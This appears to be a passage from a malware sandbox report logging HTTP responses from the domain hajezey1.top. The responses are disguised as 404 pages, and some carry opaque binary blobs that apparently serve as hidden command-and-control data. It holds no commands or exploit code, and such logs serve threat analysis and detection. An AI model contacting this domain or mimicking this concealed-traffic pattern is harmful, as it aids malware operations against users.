Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 